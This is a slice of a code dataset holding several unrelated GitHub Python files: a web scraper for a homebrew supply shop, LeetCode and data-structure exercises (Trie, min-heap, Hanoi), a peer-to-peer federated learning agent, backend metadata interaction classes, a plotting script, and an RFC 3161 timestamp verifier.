{\n \"a\": {\"b\": \"c\", \"pie\": 3, \"pi\": 3, \"const\": \"constant\"},\n \"f\": {\"g\": \"h\", \"pie\": \"3\", \"pi\": 3, \"const\": \"constant\"},\n }\n ),\n pyConfigContext({\"math\": {\"pi\": 3.14159, \"pie\": 3, \"const\": \"constant\"}}),\n pyConfigContext({\"geography\": {\"Europe\": \"big\", \"const\": \"constant\"}}),\n )\n )\n complicated_context = ExpressionContext(pyConfigContext({\"a\": {\"b\": {\"pie\": 3}}}))\n argcontext = ExpressionContext(\n pyConfigContext('{\"argv\": [\"command-name-suffix\", \"thing-one\", \"thang-two\"]}')\n )\n\n assert FOREACH((\"EQ(False, $perms.group.write, $perms.other.write)\",), lscontext) is True\n assert FOREACH((\"EQ($pi, 3)\",), Pie_context) is False\n assert FOREACH((\"EQ($pie, 3)\",), Pie_context) is None\n assert FOREACH((\"$a\", \"EQ($pie, 3)\"), complicated_context) is True\n assert FOREACH((\"$a\", \"EQ($pie, 3.14159)\"), complicated_context) is False\n assert FOREACH((\"$a\", \"EQ($pi, 3.14159)\"), complicated_context) is None\n assert FOREACH((\"EQ($const, constant)\",), Pie_context) is True\n assert GraphNodeExpression.evaluate(\"EQ($math.pie, 3)\", Pie_context) is True\n assert FOREACH((\"EQ($group, root)\",), lscontext) is True\n assert FOREACH((\"EQ($owner, root)\",), lscontext) is True\n assert FOREACH((\"AND(EQ($owner, root), EQ($group, root))\",), lscontext) is True\n assert argmatch((\"thing-(.*)\",), argcontext) == \"one\"\n assert argmatch((\"THING-(.*)\", \"$argv\", \"I\"), argcontext) == \"one\"\n assert argmatch((\"thang-(.*)\",), argcontext) == \"two\"\n assert argmatch((\"THANG-(.*)\", \"$argv\", \"I\"), argcontext) == \"two\"\n assert argmatch((\"thang-.*\",), argcontext) == \"thang-two\"\n assert argmatch((\"THANG-.*\", \"$argv\", \"I\"), argcontext) == \"thang-two\"\n print(\"Context tests passed.\", file=sys.stderr)\n\n simpletests()\n contexttests()\n print(\"All tests passed.\", file=sys.stderr)\n","repo_name":"assimilation/assimilation-official","sub_path":"cma/graphnodeexpression.py","file_name":"graphnodeexpression.py","file_ext":"py","file_size_in_byte":48328,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"18"} +{"seq_id":"31521326122","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nfrom selenium import webdriver\nimport time\n\n\nclass leagueofbrewers():\n \"\"\"\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n self.BASE_URL = 'https://leagueofbrewers.co.nz/homebrew-beer-supplies/beer-brewing-ingredients/'\n self.grain_url = 'malt-for-making-beer/grain-for-brewing?limit=25'\n self.liquid_yeast_url = 'beer-brewing-yeast/liquid-yeast-for-beer?limit=25'\n self.dry_yeast = 'beer-brewing-yeast/dry-yeast-for-beer?limit=25'\n self.hops_url = 'hops-for-brewing-beer?limit=25'\n # self.all_urls = [self.hops_url, self.grain_url, self.dry_yeast, self.liquid_yeast_url]\n self.all_urls = [self.liquid_yeast_url]\n self.s = requests.session()\n return\n\n def update_products(self):\n \"\"\"\n go through all types of products and update the database\n :return:\n \"\"\"\n for product_url in self.all_urls:\n entire_page = self._load_entire_page(self.BASE_URL+product_url)\n details = self._update_single_product(entire_page)\n self._store(details)\n return\n\n def _load_entire_page(self, url):\n \"\"\"\n Use selenium driver to load chrome, scroll then pass resultant html.\n :return:\n \"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.add_argument('chromedriver')\n driver = webdriver.Chrome(options=options)\n driver.get(url)\n ScrollNumber = 20\n for i in range(1, ScrollNumber):\n driver.execute_script(\"window.scrollTo(1,50000)\")\n time.sleep(1)\n return driver.page_source\n\n def _parseurl(self, url, sub='get', payload=''):\n if sub == 'get':\n r = self.s.get(url, verify=False)\n else:\n r = self.s.post(url, data=payload, verify=False)\n return r\n\n def _update_single_product(self, html):\n \"\"\"\n works for malt, yeast and hops. doest load the whole page however, need to work out how to JS loading whole page\n\n :param product_url: 'beer-brewing-yeast'\n :return:\n \"\"\"\n product_details = []\n soup = BeautifulSoup(html, features=\"html.parser\")\n for product in soup.findAll(class_='product-image'):\n product_name = product.img['alt']\n product_price = product.find(class_='price').text\n product_link = product.a['href']\n if product.find(class_='backorder'):\n product_availability = 0\n else:\n product_availability = 1\n product_details.append((product_name, product_price, product_link, product_availability))\n return product_details\n\n def _store(self, deets_array):\n \"\"\"\n Store the details of the items\n :return:\n \"\"\"\n for a in deets_array:\n for b in a:\n print(b)\n print(len(deets_array))\n\n\nif __name__ == '__main__':\n t = leagueofbrewers()\n t.update_products()\n","repo_name":"wookienz/homebrewstore","sub_path":"classes/leagueofbrewers.py","file_name":"leagueofbrewers.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28963843763","text":"import sys\n\n\n# leet code test\ndef find(arr, fee, sA=0):\n if len(arr) == 0: return 0\n bA = -arr[0]\n for i in arr[1:]:\n nBA = max(bA, sA - i)\n nSA = max(sA, bA + i - fee)\n bA = nBA\n sA = nSA\n return sA\n\n\n# result=13\nfee = 3\ninput = [0, 5, 7, 10, 6, 8, 12, 10, 12, 10, 13, 15]\n# result=6\nfee = 3\ninput = [1, 3, 7, 5, 10, 3]\n# result=8\nfee = 2\ninput = [1, 3, 2, 8, 4, 9]\n# result=0\nfee = 3\ninput = [9, 8, 7, 1, 2]\n# result=0\nfee = 0\ninput = [1]\n# result=4\nfee = 1\ninput = [2, 1, 4, 4, 2, 3, 2, 5, 1, 2]\nprint(find(input, fee))\n","repo_name":"PalampurRockstar/Algorithm","sub_path":"src/main/python/algo/medium/BuyAndSellStockInfiniteTransactionEachWithFee.py","file_name":"BuyAndSellStockInfiniteTransactionEachWithFee.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74650609320","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef move(n, a, b, c):\n\tprint(\"move({0},{1},{2},{3})\".format(n,a,b,c))\n\tif n == 1:\n\t\tprint(\"从 {0} 移动到 {1}\".format(a,c))\n\telse:\n\t\tmove(n-1, a, c, b) # 借助 c 将 \n\t\tmove(1, a, b, c)\n\t\tmove(n-1, b, a, c)\n\nif __name__ == '__main__': \n\tmove(3, 'A', 'B', 'C')","repo_name":"leeliang/python-learning","sub_path":"code/00_Hanoi.py","file_name":"00_Hanoi.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15282632880","text":"from p2p.agents.sync_agent import *\nfrom models.abstract_model import weights_average\nimport numpy as np\n\n# Decentralized federated learning of deep neural networks on non-iid data\n# Authors: Onoszko, Noa\n# Karlsson, Gustav\n# Mogren, Olof\n# Zec, Edvin Listo\n\n\nclass PensAgent(SyncAgent):\n def __init__(self, rounds=100, n_sampled=6, top_m=3, n_peers=3, fixed_comm=False, **kwargs):\n super(PensAgent, self).__init__(**kwargs)\n self.rounds = rounds\n self.n_sampled = n_sampled\n self.top_m = top_m\n self.n_peers = n_peers\n self.fixed_comm = fixed_comm\n self.iteration = 0\n self.selected_peers = {}\n self.new_weights = None\n\n def train_fn(self):\n if self.new_weights is not None:\n self.set_model_weights(self.new_weights)\n self.new_weights = None\n self.iteration += 1\n return super(PensAgent, self).train_fn()\n\n def pull_from_peers(self):\n if self.iteration < self.rounds:\n p = np.arange(self.graph.nodes_num)\n p = p[p != self.id]\n indx = np.random.choice(p, self.n_sampled, replace=False)\n peers = [p for p in self.graph.nodes if p.id in indx]\n # peers = np.random.choice(list(set(self.graph.nodes) - {self}), self.n_sampled, replace=False)\n else:\n expected_samples = (self.top_m / self.graph.nodes_num) * self.rounds\n peers = [k for k, v in self.selected_peers.items() if v > expected_samples]\n indx = np.random.choice(np.array([p.id for p in peers]), self.n_peers, replace=False)\n peers = [p for p in peers if p.id in indx]\n # peers = np.random.choice(peers, size=self.n_peers, replace=False)\n if self.fixed_comm:\n graph_peers = self.graph.get_peers(self.id)\n # If the comm matrix is built, use that peers in fixed communication\n if len(graph_peers) != 0:\n peers = graph_peers\n for peer in peers:\n super(PensAgent, self).receive_message(peer)\n\n if self.iteration < self.rounds:\n saved_models = {self.eval_model_loss(p.model, self.train): p for p in peers}\n peers = list(dict(sorted(saved_models.items())).values())[:self.top_m]\n for peer in peers:\n # We want to receive more messages from this peer so mark as selected peer\n if peer not in self.selected_peers:\n self.selected_peers[peer] = 0\n self.selected_peers[peer] += 1\n\n alphas = [self.train_len] + [peer.train_len for peer in peers]\n ws = [self.get_model_weights()] + [peer.get_model_weights() for peer in peers]\n self.new_weights = weights_average(ws, alphas)\n\n self.hist['selected_peers'] = {p.id: v for p, v in self.selected_peers.items()}\n\n def sync_parameters(self):\n self.pull_from_peers()\n\n def update_parameters(self):\n pass\n","repo_name":"rosaj/p2p_sgd","sub_path":"p2p/agents/pens_agent.py","file_name":"pens_agent.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6232574327","text":"import logging\nfrom abc import abstractmethod\nfrom datetime import datetime\n\nimport gevent\nfrom about_time import about_time\nfrom cached_property import threaded_cached_property\nfrom gevent import Timeout, joinall, killall\n\nfrom metadata.backend.interface import BackendType\nfrom metadata.exc import InteractTimeOut, NotImplementedByBackendError\nfrom metadata.interactor.core import TransactionalOperations\nfrom metadata.interactor.orchestrate import (\n BatchDGraphOrchestrator,\n BatchMySQLReplicaOrchestrator,\n MySQLReplicaOrchestrator,\n SingleDGraphOrchestrator,\n)\nfrom metadata.interactor.record import LocalRecordsPersistence\nfrom metadata.interactor.transcation import TransactionalDispatchMixIn\nfrom metadata.runtime import rt_context, rt_local, rt_local_manager\nfrom metadata.util.common import StrictABCMeta\nfrom metadata.util.context import inherit_local_ctx\nfrom metadata.util.i18n import selfish as _\n\n\nclass Interactor(object, metaclass=StrictABCMeta):\n __abstract__ = True\n\n def __init__(self, backends_in_use, timeout_sec=None, if_recording=True):\n self.backends_in_use = backends_in_use\n self.config_collection = rt_context.config_collection\n self.timeout_sec = (\n self.config_collection.interactor_config.INTERACTOR_TIMEOUT if not timeout_sec else self.timeout_sec\n )\n self.son_timeout_sec = self.timeout_sec - 5 if self.timeout_sec > 10 else self.timeout_sec\n self.if_recording = if_recording\n self.local_persistence = LocalRecordsPersistence()\n self.transactional_operations = None\n self.operate_records = None\n self.batch = False\n self.transaction_count = 0\n\n self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)\n\n @threaded_cached_property\n def sessions(self):\n \"\"\"\n Interactor使用的各类session。\n\n \"\"\"\n sessions = {}\n if self.backends_in_use.get(BackendType.MYSQL, False):\n sessions[BackendType.MYSQL] = rt_context.mysql_backend.operate_session().session\n if self.backends_in_use.get(BackendType.DGRAPH, False):\n sessions[BackendType.DGRAPH] = rt_context.dgraph_backend.operate_session()\n if self.backends_in_use.get(BackendType.DGRAPH_BACKUP, False):\n sessions[BackendType.DGRAPH_BACKUP] = rt_context.dgraph_backup_backend.operate_session()\n if self.backends_in_use.get(BackendType.DGRAPH_COLD, False):\n sessions[BackendType.DGRAPH_COLD] = rt_context.dgraph_cold_backend.operate_session()\n db_name = self.backends_in_use.get(BackendType.CONFIG_DB, None)\n if db_name:\n sessions[BackendType.CONFIG_DB] = rt_context.biz_mysql_backends[db_name].operate_session().session\n return sessions\n\n @abstractmethod\n def dispatch(self, *args, **kwargs):\n \"\"\"\n 与后端进行一次完整交互。\n\n \"\"\"\n pass\n\n @abstractmethod\n def invoke(self, *args, **kwargs):\n \"\"\"\n 执行各类数据操作。提交前,可多次调用。\n\n \"\"\"\n\n def apply(self, *args, **kwargs):\n \"\"\"\n 提交操作变更。\n\n \"\"\"\n self.renew_at_apply_prepare()\n ret = self.basic_apply()\n self.renew_at_applied()\n return ret\n\n @abstractmethod\n def basic_apply(self, *args, **kwargs):\n \"\"\"\n 核心变更提交操作。\n\n \"\"\"\n pass\n\n def setup_transactional_operations(self):\n dispatch_id = getattr(rt_context, 'dispatch_id', None)\n if dispatch_id:\n for record in self.operate_records:\n if not record.operate_id:\n record.operate_id = dispatch_id\n self.transactional_operations = TransactionalOperations(\n operations=self.operate_records, operate_id=dispatch_id\n )\n else:\n self.transactional_operations = TransactionalOperations(operations=self.operate_records)\n\n def renew_at_apply_prepare(self):\n check_dict = {}\n self.logger.info('Transaction with ID {} is preparing to apply.'.format(self.transaction_count))\n for item in self.operate_records:\n item.transaction_id = self.transaction_count\n item_dict = {\n name: getattr(item, name)\n for name in dir(item)\n if not name.startswith('__') and not callable(getattr(item, name))\n }\n mysql_table_name = item_dict.get('extra_', {}).get('mysql_table_name', None)\n if mysql_table_name:\n if mysql_table_name not in check_dict:\n check_dict[mysql_table_name] = []\n check_dict[mysql_table_name].append(item_dict)\n try:\n if not self.check_data_legality(check_dict):\n self.logger.exception('[check_lineage] Data sync is illegal: {}'.format(check_dict))\n except Exception as err:\n self.logger.exception('[check_lineage] check lineage occur error: {}'.format(err))\n self.transactional_operations.transaction_id = self.transaction_count\n self.transactional_operations.state = 'ApplyPrepare'\n self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n def renew_at_applied(self):\n self.logger.info('Transaction with ID {} is applied.'.format(self.transaction_count))\n self.transactional_operations.apply_time = datetime.now()\n self.transactional_operations.state = 'Applied'\n self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n def check_data_legality(self, check_dict):\n \"\"\"\n 检查同步数据的合法性\n check rules list:\n 1.监控data_processing_relation写入,检查血缘完整性\n \"\"\"\n if 'data_processing_relation' in check_dict and self.backends_in_use.get(BackendType.DGRAPH, False):\n return rt_context.dgraph_backend.check_lineage_integrity(\n check_dict['data_processing_relation'], self.sessions[BackendType.DGRAPH]\n )\n return True\n\n\nclass SingleInteractor(TransactionalDispatchMixIn, Interactor):\n \"\"\"\n 仅供单个后端使用的Interactor。\n \"\"\"\n\n backup_backend_support = True\n\n def __init__(self, backend_type, *args, **kwargs):\n if backend_type is BackendType.MYSQL:\n raise NotImplementedByBackendError(_('Edit function is not enabled in MySQL backend.'))\n self.backend_type = backend_type\n super(SingleInteractor, self).__init__(backends_in_use={self.backend_type: True}, *args, **kwargs)\n self.backend_session = self.sessions[self.backend_type]\n\n def dispatch(self, operate_records, batch=False):\n self.operate_records = operate_records\n self.batch = batch\n self.setup_transactional_operations()\n self.local_persistence.save(self.transactional_operations)\n with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n with self.backend_session:\n self.transactional_inner_dispatch()\n\n def invoke(self):\n setattr(rt_local, '{}_session_now'.format(self.backend_type.raw.value), self.backend_session)\n b = (\n BatchDGraphOrchestrator(backend_session=self.backend_session)\n if self.batch\n else SingleDGraphOrchestrator(backend_session=self.backend_session)\n )\n b.dispatch(self.operate_records)\n\n def basic_apply(self):\n ret = self.backend_session.commit()\n del self.sessions\n return ret\n\n\nclass ParallelInteractor(TransactionalDispatchMixIn, Interactor):\n \"\"\"\n 多个后端同时调度的Interactor。\n \"\"\"\n\n backup_backend_support = False\n\n def __init__(self, *args, **kwargs):\n super(ParallelInteractor, self).__init__(*args, **kwargs)\n self.available_backends = self.backends_in_use\n self.metric_store = {}\n self.mysql_gl, self.dgraph_gl, self.config_db_gl = None, None, None\n self.invoking_greenlets = []\n self.record_keys_lst = None\n\n def dispatch(self, operate_records, batch):\n self.operate_records = operate_records\n self.batch = batch\n self.setup_transactional_operations()\n self.local_persistence.save(self.transactional_operations)\n self.record_keys_lst = [item.operate_id if item.operate_id else item for item in operate_records]\n with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n try:\n # 针对多种后端启用情况,持有事务,执行数据交互操作\n for k, v in list(self.sessions.items()):\n v.__enter__()\n self.transactional_inner_dispatch()\n finally:\n # 任何状态下,子同步协程都应该在完成该函数调用时结束。\n killall(self.invoking_greenlets)\n for k, v in list(self.sessions.items()):\n v.__exit__(None, None, None)\n\n def invoke(self):\n self.invoking_greenlets = []\n if self.available_backends.get(BackendType.CONFIG_DB):\n g = gevent.spawn(inherit_local_ctx(self.renew_config_db, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n if self.available_backends.get(BackendType.MYSQL):\n g = gevent.spawn(inherit_local_ctx(self.interact_with_mysql, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n if self.available_backends.get(BackendType.DGRAPH):\n g = gevent.spawn(inherit_local_ctx(self.interact_with_dgraph, rt_local, rt_local_manager))\n self.invoking_greenlets.append(g)\n joinall(self.invoking_greenlets, raise_error=False)\n for item in self.invoking_greenlets:\n if not item.successful():\n item._raise_exception()\n\n def basic_apply(self):\n self.logger.info('sessions_this_time is {}'.format(self.sessions))\n if self.available_backends.get(BackendType.DGRAPH):\n with about_time() as t:\n self.sessions[BackendType.DGRAPH].commit()\n self.commit_metric(t, BackendType.DGRAPH.value)\n\n if self.available_backends.get(BackendType.CONFIG_DB, False):\n with about_time() as t:\n self.sessions[BackendType.CONFIG_DB].commit()\n self.commit_metric(t, BackendType.CONFIG_DB.value)\n\n if self.available_backends.get(BackendType.MYSQL, False):\n with about_time() as t:\n self.sessions[BackendType.MYSQL].commit()\n self.commit_metric(t, BackendType.MYSQL.value)\n\n del self.sessions\n\n def commit_metric(self, t, session_type):\n \"\"\"\n commit 统计。\n\n :param t: 时间\n :param session_type: session类型\n :return:\n \"\"\"\n self.logger.info(\n {\n 'session_type': '{}'.format(session_type),\n 'metric_type': 'session_commit',\n 'elapsed_time': t.duration,\n 'invoke_elapsed_time': self.metric_store.get('{}_invoke_elapsed_time'.format(session_type), 0.0),\n 'operate_ids': self.metric_store.get('{}_operate_ids'.format(session_type), []),\n },\n extra={'output_metric': True},\n )\n\n def interact_with_mysql(\n self,\n ):\n \"\"\"\n Interact with MySql\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('mysql interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.MYSQL]\n mysql_b = (\n BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n if self.batch\n else MySQLReplicaOrchestrator(backend_session=mysql_session)\n )\n with about_time() as t:\n mysql_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'mysql', 'interactor_dispatch', t, self.metric_store)\n\n def interact_with_dgraph(self):\n \"\"\"\n Interact with Dgraph\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('dgraph interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.dgraph_session_now = dgraph_session = self.sessions[BackendType.DGRAPH]\n dgraph_b = (\n BatchDGraphOrchestrator(backend_session=dgraph_session)\n if self.batch\n else SingleDGraphOrchestrator(backend_session=dgraph_session)\n )\n with about_time() as t:\n dgraph_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'dgraph', 'interactor_dispatch', t, self.metric_store)\n\n def renew_config_db(\n self,\n ):\n \"\"\"\n Interact with ConfigDB\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('config_db interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.CONFIG_DB]\n mysql_b = (\n BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n if self.batch\n else MySQLReplicaOrchestrator(backend_session=mysql_session)\n )\n with about_time() as t:\n mysql_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'config_db', 'interactor_dispatch', t, self.metric_store)\n\n def sync_metric(self, record_id_lst, backend_type, metric_type, cost, metric_store=None):\n if metric_store is not None:\n metric_store['{}_invoke_elapsed_time'.format(backend_type)] = cost.duration\n metric_store['{}_operate_ids'.format(backend_type)] = record_id_lst\n self.logger.info(\n {\n 'record_ids': record_id_lst,\n 'backend_type': backend_type,\n 'metric_type': metric_type,\n 'elapsed_time': cost.duration,\n },\n extra={'output_metric': True},\n )\n","repo_name":"Tencent/bk-base","sub_path":"src/datamgr/metadata/metadata/interactor/interact.py","file_name":"interact.py","file_ext":"py","file_size_in_byte":14376,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"38927412600","text":"#\r\n# @lc app=leetcode id=211 lang=python3\r\n#\r\n# [211] Design Add and Search Words Data Structure\r\n#\r\n\r\n# @lc code=start\r\n\r\nclass TrieNode():\r\n\r\n def __init__(self):\r\n self.children = [None] * 128\r\n self.end = False\r\n\r\n def set_char(self, char):\r\n index = ord(char)\r\n node = TrieNode()\r\n self.children[index] = node\r\n return node\r\n\r\n def get_child(self, char):\r\n index = ord(char)\r\n return self.children[index]\r\n\r\n\r\nclass Trie:\r\n \"\"\"\r\n noob implement\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.root = TrieNode()\r\n\r\n def insert(self, word: str) -> None:\r\n \"\"\"\r\n Inserts a word into the trie.\r\n \"\"\"\r\n head = self.root\r\n for w in word:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n head = head.set_char(w)\r\n head.end = True\r\n\r\n def search(self, root, word: str, index) -> bool:\r\n \"\"\"\r\n Returns if the word is in the trie.\r\n \"\"\"\r\n print(word[index:])\r\n if index == len(word):\r\n return root.end\r\n\r\n head = root\r\n for i in range(index, len(word)):\r\n w = word[i]\r\n if w == \".\":\r\n for c in head.children:\r\n if c and self.search(c, word, i+1):\r\n return True\r\n return False\r\n else:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return head.end\r\n\r\n def startsWith(self, prefix: str) -> bool:\r\n \"\"\"\r\n Returns if there is any word in the trie that starts with the given prefix.\r\n \"\"\"\r\n head = self.root\r\n for w in prefix:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return True\r\n\r\n\r\nclass WordDictionary:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.trie = Trie()\r\n\r\n def addWord(self, word: str) -> None:\r\n \"\"\"\r\n Adds a word into the data structure.\r\n \"\"\"\r\n self.trie.insert(word)\r\n\r\n def search(self, word: str) -> bool:\r\n \"\"\"\r\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\r\n \"\"\"\r\n return self.trie.search(self.trie.root, word, 0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = WordDictionary()\r\n s.addWord(\"bad\")\r\n print(s.search(\"b.d\"))\r\n\r\n# Your WordDictionary object will be instantiated and called as such:\r\n# obj = WordDictionary()\r\n# obj.addWord(word)\r\n# param_2 = obj.search(word)\r\n# @lc code=end\r\n","repo_name":"huhudev-git/leetcode","sub_path":"211.design-add-and-search-words-data-structure.py","file_name":"211.design-add-and-search-words-data-structure.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39108269451","text":"import matplotlib.pyplot as plt\r\nimport csv, random\r\nfrom datetime import datetime\r\n\r\nfilename= 'aboration_rate.csv'\r\nwith open(filename) as f:\r\n reader = csv.reader(f)\r\n header_row = next(reader)\r\n\r\n for index, data in enumerate(header_row):\r\n print(index, data)\r\n\r\n abortion, ages, period = [], [], []\r\n\r\n for row in reader:\r\n period.append(row[0])\r\n abortion.append(float(row[2]))\r\n ages.append(row[1])\r\n\r\nfig = plt.figure(dpi=128)\r\ncolors = ['red', 'blue', 'green', 'lightblue', 'yellow', 'darkgreen', 'darkblue', 'violet']\r\nx=0\r\ny=9\r\nyear = 2000\r\nfor i in range(19):\r\n plt.plot(ages[x:y], abortion[x:y], c=random.choice(colors), label=str(year))\r\n x+=8\r\n y+=8\r\n year+=1\r\n\r\nplt.title(\"Aboration rate from 2000 to 2018\", fontsize=24)\r\nplt.xlabel(\"Women age\", fontsize=14)\r\nplt.ylabel(\"Aboration Rate\", fontsize=14)\r\nplt.tick_params(axis='both', labelsize=14)\r\nfig.autofmt_xdate()\r\nplt.legend()\r\nplt.show()\r\n\r\n","repo_name":"AliAhmed15245/Data-visualiztion-python","sub_path":"csv files visualization/aboration_rate.py","file_name":"aboration_rate.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3824225489","text":"\"\"\"\nModule to confirm the integrity of the timestamped document\n\"\"\"\nfrom pyasn1.type import univ\nfrom pyasn1.codec.der import decoder\nimport hashlib\nfrom rfc3161 import TimeStampResp, TSTInfo\n\nTSR_FILE = 'READ_ME__txt.tsr'\nFILE = 'READ_ME_.txt'\n\ndigest_algorithms = {\n univ.ObjectIdentifier('1.3.14.3.2.26'): 'sha1',\n univ.ObjectIdentifier('1.2.840.113549.2.5'): 'md5',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.1'): 'sha256',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.2'): 'sha384',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.3'): 'sha512'\n}\n\n\ndef main(tsr: str, file: str):\n \"\"\"\n :param tsr: Verified timestamp response filepath\n :param file: Original document path\n :return:\n \"\"\"\n print('Confirming the integrity of original document...')\n try:\n response, _ = decoder.decode(open(tsr, 'rb').read(), asn1Spec=TimeStampResp())\n\n e_content = response['timeStampToken']['content']['encapContentInfo']['eContent']\n tst_info, _ = decoder.decode(e_content, asn1Spec=TSTInfo())\n\n if tst_info['messageImprint']['hashAlgorithm']['algorithm'] in digest_algorithms:\n hash_str = digest_algorithms.get(tst_info['messageImprint']['hashAlgorithm']['algorithm'])\n else:\n print(f'The hash algorithm is not listed', str(tst_info['messageImprint']['hashAlgorithm']['algorithm']))\n return False\n\n hash_tst = tst_info['messageImprint']['hashedMessage']\n\n hash_obj = hashlib.new(hash_str)\n\n with open(file, 'rb') as doc:\n hash_obj.update(doc.read())\n\n print('TSTInfo hashedMessage: ', hash_tst.asOctets().hex())\n print('Hash of original file: ', hash_obj.digest().hex())\n\n assert hash_tst.asOctets() == hash_obj.digest()\n return True\n except Exception as e:\n print('The file has changed since the date in TSTInfo', e)\n\n return False\n\n\nif __name__ == '__main__':\n main(TSR_FILE, FILE)\n","repo_name":"NuqieNoila/dts_client","sub_path":"confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70114487401","text":"#\n# https://leetcode.com/explore/learn/card/heap/643/heap/4017/\n#\n#\n\nfrom typing import List\nimport sys\nimport pdb\nbr = pdb.set_trace\n\nsolution_json = {\n \"date\": \"2022/10/4\",\n \"design\": 0,\n \"coding\": 0,\n \"runtime\": \"?? ms\",\n \"fasterThan\": \"\",\n \"memory\": \"?? MB\" \n}\n\nclass Solution:\n def __init__(self):\n self.module = sys.modules[__name__]\n\n\"\"\"\n 0\n 1 2\n 3 4 5 6\n\"\"\"\n\ndef parent(i):\n if i % 2 == 0:\n return (i - 1) // 2\n else:\n return i // 2\n\ndef left(i):\n return i * 2 + 1\n\ndef right(i):\n return (i + 1) * 2 \n\n\"\"\"\n 3 1 \n 1 ---> 3 \n\"\"\"\n\ndef heapify(a):\n n = len(a)\n i = n - 1\n while True:\n if i == 0:\n break\n\n if a[i] < a[parent(i)]:\n swap(a, i, parent(i))\n i = parent(i)\n else:\n break\n\ndef swap(a, i, j):\n a[i], a[j] = a[j], a[i] \n\n'''\n 10 10 10\n 3 5 3 20 5 3 \n'''\ndef down_heapify(a):\n n = len(a)\n i = 0 \n while True:\n idx = None \n if left(i) <= n - 1:\n if a[left(i)] < a[i]:\n idx = left(i)\n\n if right(i) <= n - 1:\n if a[right(i)] < a[i]:\n if idx == None:\n idx = right(i)\n else:\n if a[right(i)] < a[idx]:\n idx = right(i)\n\n if idx == None:\n break\n\n swap(a, idx, i)\n i = idx \n\n#\n# Implementing \"Min Heap\"\n#\n\nclass MinHeap:\n def __init__(self, heapSize):\n self.a = []\n self.max = heapSize\n pass\n\n #\n # Example:\n # obj = MinHeap()\n # ...\n # print(str(obj))\n # [1,2,3]\n #\n\n def __str__(self):\n return \"%s\" % self.a \n\n def dump(self):\n print('%s' % self.a)\n\n #\n # Function to add an element\n # element >= 1\n # \n \"\"\"\n 3\n 1 2\n \"\"\"\n def add(self, element):\n self.a.append(element)\n heapify(self.a)\n pass\n \n #\n # Get the top element of the Heap\n #\n\n def peek(self):\n return self.a[0]\n \n #\n # Delete the top element of the Heap\n #\n\n def pop(self):\n last_i = len(self.a) - 1\n swap(self.a, 0, last_i)\n min_v = self.a.pop()\n down_heapify(self.a)\n return min_v\n \n #\n # return the number of elements in the Heap\n #\n\n def size(self):\n return 0\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_07_heap/solutions/my001-min-heap-s2.py","file_name":"my001-min-heap-s2.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70782457641","text":"import argparse\nimport contextlib\nimport numpy as np\n\nfrom inout_bits import BitInputStream, BitOutputStream\n\n\nCORRECTION_MATRIX = np.array([[0, 0, 0, 1, 1, 1, 1],\n [0, 1, 1, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 0, 